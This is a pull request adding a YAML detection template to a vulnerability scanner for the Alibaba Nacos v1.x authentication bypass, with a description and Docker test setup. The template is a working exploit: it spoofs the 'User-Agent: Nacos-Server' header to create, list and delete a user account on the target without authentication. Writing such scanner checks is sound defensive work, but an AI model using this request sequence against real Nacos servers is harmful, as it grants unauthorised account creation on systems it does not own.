### PR TITLE
add alibaba nacos v1.x authentication bypass detection

### DIFF
--- a/pocs/alibaba-nacos-v1-auth-bypass.yml
+++ b/pocs/alibaba-nacos-v1-auth-bypass.yml
@@ -1,0 +1,27 @@
+name: poc-yaml-alibaba-nacos-v1-auth-bypass
+set:
+  r1: randomLowercase(16)
+  r2: randomLowercase(16)
+rules:
+  - method: POST
+    path: "/nacos/v1/auth/users?username={{r1}}&password={{r2}}"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("create user ok!"))
+  - method: GET
+    path: "/nacos/v1/auth/users?pageNo=1&pageSize=999"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(r1))
+  - method: DELETE
+    path: "/nacos/v1/auth/users?username={{r1}}"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("delete user ok!"))
+detail:
+  author: kmahyyg(https://github.com/kmahyyg)
+  links:
+    - https://github.com/alibaba/nacos/issues/4593


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

check https://github.com/alibaba/nacos/issues/4593

In brief, while the web console of NacOs is enabled, the authentication can be bypassed by setting http header `User-Agent: Nacos-Server` even the authentication is enabled.

## 测试环境

Use the official docker image.

1. Clone https://github.com/nacos-group/nacos-docker
2. Append this to `<REPO ROOT>/env/nacos-hostname.env`

```
NACOS_AUTH_ENABLE=true
NACOS_AUTH_TOKEN=this-is-a-very-long-token-at-least-192-bytes-recommend-256-bytes-without-any-special-symbols
```

3. `sudo docker-compose -f ./example/cluster-hostname.yaml up`
 

## 备注

Nothing else.

Already lint, and tested.

![image](https://user-images.githubusercontent.com/16604643/104181918-9049c980-544a-11eb-87a4-405160005675.png)

![image](https://user-images.githubusercontent.com/16604643/104181980-ad7e9800-544a-11eb-9255-f8e9c5d561be.png)


